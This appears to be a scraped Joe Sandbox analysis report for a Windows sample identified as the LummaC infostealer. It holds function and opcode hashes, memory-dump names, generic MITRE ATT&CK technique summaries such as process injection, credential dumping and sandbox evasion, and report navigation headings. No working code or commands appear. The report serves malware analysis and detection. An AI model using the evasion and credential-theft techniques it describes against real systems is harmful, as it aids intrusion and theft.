Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bea8b34c3601ec71cf7e7e3c3cab83bee2a75d3a066706297cac6bfb4f1da37
Instruction ID: 107404095f5ac43e80eb0fd1d6cf3b4e0a39d9b654cefcf415d1a156e71fbb8e
Opcode Fuzzy Hash: 8bea8b34c3601ec71cf7e7e3c3cab83bee2a75d3a066706297cac6bfb4f1da37
Instruction Fuzzy Hash: DD41BF327082294BCB188E6DCD9026AFAD2EFC5744F1DC679E889D734AE634D8109791

Function 0087E07F Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e3165e2997142d61480b7bb05094776c02fbe09a8203cea96040d970833ea2
Instruction ID: 9e3a8ad694acd7c4a3cef6619c25d25408baf4cc048384fa4ddf557c39b50bb2
Opcode Fuzzy Hash: 87e3165e2997142d61480b7bb05094776c02fbe09a8203cea96040d970833ea2
Instruction Fuzzy Hash: 4641017425C3418FC718DFA4D89156BB7E2FF99304F08C96CE48AC72A1EB348A09CB19

Function 00899677 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94df868b21a8086927e54cd1dca12c32d0eb539840f9a53cc25282a905668f35
Instruction ID: e7f8b01a7099a540f8bd4b3cfd4e290d0357cc4890a6c425973253fe522cebf3
Opcode Fuzzy Hash: 94df868b21a8086927e54cd1dca12c32d0eb539840f9a53cc25282a905668f35
Instruction Fuzzy Hash: 8951A372A043288FCB29CF68C44129EB7F1FB95314F6685ADC85AAB745DB349D02CF80

Function 0089B20C Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748030394c7645062859b33c948bc3e84344d682fd1f7f0a86152fab57b7c5ec
Instruction ID: 35e6080731518545a9af14afeeeabce3af8e429b97ce67344ab04d0c549f1f63
Opcode Fuzzy Hash: 748030394c7645062859b33c948bc3e84344d682fd1f7f0a86152fab57b7c5ec
Instruction Fuzzy Hash: 90313773E15A3907DB18896DAC1527A76C29BD8251F4E837DDC6ACF3C6DE309C0592C0

Function 0089726C Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc301fb37fbadebe44cc9e1e1dfd6ba469ba7c5f85e1902a74c96d90598a12e
Instruction ID: d4000905ba6b2f1e877d7c317b782477c777e1fa7c561635feb31cf0134435d4
Opcode Fuzzy Hash: ddc301fb37fbadebe44cc9e1e1dfd6ba469ba7c5f85e1902a74c96d90598a12e
Instruction Fuzzy Hash: 3A41A2B2A2D7408FE724DF25D80169BBAB2EBD2344F19881CD5D4AB305DA35C5068B97

Function 008713DF Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction ID: 951fdc845b3ddd19efa46497d8bdaddc495ac554265c76f4540de778b97dced4
Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction Fuzzy Hash: 1C515074E00109DFCF08CF88C594AAEB7B2FF88314F248199D815AB755D735AE51DBA4

Function 008AC8ED Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f704b34838e0f11ccc0bdad832d766aadb1a698bc6a49d768dc77d4a4ac72818
Instruction ID: 70a1a1cf4e15db417396155ae82b839c0f3409796add37d62c554ead6f8b06c1
Opcode Fuzzy Hash: f704b34838e0f11ccc0bdad832d766aadb1a698bc6a49d768dc77d4a4ac72818
Instruction Fuzzy Hash: C2212578615209AFE7689B148C8153FB756FBAB310F2C967DE492C3B95CB349D028B44

Function 008861E8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c7d7f206b13452374d99729dbd71f64755a6902cdd86dbb5f8afe5f3883dd8
Instruction ID: 7672f8b7a4d49fa449681d372eeb6428fad97a6a4a28191e757c2ce9306cc08b
Opcode Fuzzy Hash: 62c7d7f206b13452374d99729dbd71f64755a6902cdd86dbb5f8afe5f3883dd8
Instruction Fuzzy Hash: 76112239B5520056E768AB299C42B3AB363F7D7711F29A06CE140D72DAEF7188518709

Function 008713DE Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: da200e52e12e4ba2e9f97e7d6e1212b9f3878d6a735bb075f58912144a8e23df
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: 03318274E00119DFCF08CF98C594AAEBBB2FF48314F248599D815AB345D335AA82CF94

Function 008A4D7C Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5aa847ee0c2e10f0d030b5240ef6c07f8dc2a98133dc2d1eadba38c57be534bb
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 52112533A041D44ED7168D3C84005A5BFE3AAE3634B599399F4F8DB2D3C6228D8A8350

Function 0089A57C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca27d80bb77d6f41407c7929366d07a0e1ee7ff0683ac23e858ba0514df5e08
Instruction ID: cb5f37a1e95b6a927261855a56a10f51b379316415c6abee8401894c898a7ece
Opcode Fuzzy Hash: eca27d80bb77d6f41407c7929366d07a0e1ee7ff0683ac23e858ba0514df5e08
Instruction Fuzzy Hash: FE014CB1B0021157DE24BEA894C1727B6A8FB94710F1E842CE95DD7201EB75E8098BD7

Function 008747EC Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e17b46b8b93681940eb964b697051b25580617ca7e158580fce7974d985bb66
Instruction ID: 4a8eea26287d45f3cc978e9dffc91f13639d0d0f85414e085d9b8f15c25b0b6a
Opcode Fuzzy Hash: 8e17b46b8b93681940eb964b697051b25580617ca7e158580fce7974d985bb66
Instruction Fuzzy Hash: 5CF0F63AB552590BE314DD6AECC496BB3A6FBC5308B18D13CE558D3705C634E80682A1

Function 008988E1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febd845d7fbc1560b30782dc8a908ad84e660151c74c2555bcc22d68c84ce4d3
Instruction ID: cb69ed0e8bb90c3982618a37202bea8926eb991ba792a726a64d193fae0b35f0
Opcode Fuzzy Hash: febd845d7fbc1560b30782dc8a908ad84e660151c74c2555bcc22d68c84ce4d3
Instruction Fuzzy Hash: 5C018BB190C3818BD704CF25C880A1BFBE5EBEA218F146A2CE08597615D371C9058B4B

Function 008ACB6C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a28e092b65ff540d28a50155b7a14f39c29ff7934229107a3a12203bf757103
Instruction ID: 6e50713cc56d1886e26e6f28270b162cfd9c66e059536ad687947c781b120adf
Opcode Fuzzy Hash: 2a28e092b65ff540d28a50155b7a14f39c29ff7934229107a3a12203bf757103
Instruction Fuzzy Hash: C3F05925A892808BC30C9F3198A14BA7BB5EB87604F04412DE4C393341D6298815CB3A

Function 0087113F Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 757966688ac904fea17f4413a2abe8c6d5aad64655ebb09d6c8b6ff10cf3c8de
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 1701F634A01148EFCF14DF98C688AACB7B2FF54310F649599D919ABB98D730EE81DB50

Function 0088A893 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1049ae9babb13462fe44cc634d3d33307941569041ce766013df962ec1b4ad6a
Instruction ID: 1d35edb182f78556c0222c8282c1516968621fa8664db9b1d884672b6640ecba
Opcode Fuzzy Hash: 1049ae9babb13462fe44cc634d3d33307941569041ce766013df962ec1b4ad6a
Instruction Fuzzy Hash: 1CF08CB190020AEFCB20AF44C841AA7BBF1FF49750F04846AF8899B220E330CD51DB66

Function 0087BFE8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293cf65d0496148bedda2d5ee0e6efee0f8d1c1cce51e9cafa164afeb48d2f28
Instruction ID: 0750a3e12c5b7473739b317144c6009eff03b611ba35107cc314155bde7b29ab
Opcode Fuzzy Hash: 293cf65d0496148bedda2d5ee0e6efee0f8d1c1cce51e9cafa164afeb48d2f28
Instruction Fuzzy Hash: 7BF09238E401118BC7148F18CC622B2B3B2FF8B341B18E466E542DB728E738D845C748

Function 0087DA6E Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334d6e4c3943ef95b73ff6a5b66c52bb1a96d6ad7b51dcfe65c98a45960ad9f5
Instruction ID: 916c9a9cfda63af83d54c0006b6bb9d6178873750755e61ca1286201313e3bc0
Opcode Fuzzy Hash: 334d6e4c3943ef95b73ff6a5b66c52bb1a96d6ad7b51dcfe65c98a45960ad9f5
Instruction Fuzzy Hash: 68C04C7CA4C144CBC705EF18E851B31BBF4A72724AF15356CD196E73B2C621E4908B1D

Function 00899628 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c340a932ba35376cde1bc8ac8a86423a7d80cb31c27f54effc6cc80f2d7bb414
Instruction ID: 417c753c0f40b2999324faed85c7d69c1ffca93320798aa5e1963429ca5ab8e8
Opcode Fuzzy Hash: c340a932ba35376cde1bc8ac8a86423a7d80cb31c27f54effc6cc80f2d7bb414
Instruction Fuzzy Hash: 74B092B1C0402086CA01EF44A842479F274A70B202F10A420D40CB3125D621DA148A0A

Function 008988DC Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_RIMz2N1u5y.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d329d514cb0f3958576ae7273cfec8d0b62196dc83ab1d01189bb34e7847925
Instruction ID: aaff3b129ea5dd76544aa8a860c82302132c0d51599c9aa12191b10a9fe2c5ff
Opcode Fuzzy Hash: 0d329d514cb0f3958576ae7273cfec8d0b62196dc83ab1d01189bb34e7847925
Instruction Fuzzy Hash: A0A00228D4C549CE8500DF04D494674E678F20FA06F243514A04AF7112C650E504E74D

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RIMz2N1u5y.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
RIMz2N1u5y.exe

Function 00870EDF Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 008707CF Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 399
threadCOMMON

Function 00870D8F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 008BE2E4 Relevance: 6.1, APIs: 4, Instructions: 99
memoryCOMMON

Function 008BF154 Relevance: 4.8, APIs: 3, Instructions: 325
memoryCOMMON

Function 008C0502 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 008BE3DF Relevance: 3.0, APIs: 2, Instructions: 48
memoryCOMMON

Function 008A546D Relevance: 80.4, Strings: 64, Instructions: 372
COMMON

Function 00894CFC Relevance: 29.2, Strings: 23, Instructions: 455
COMMON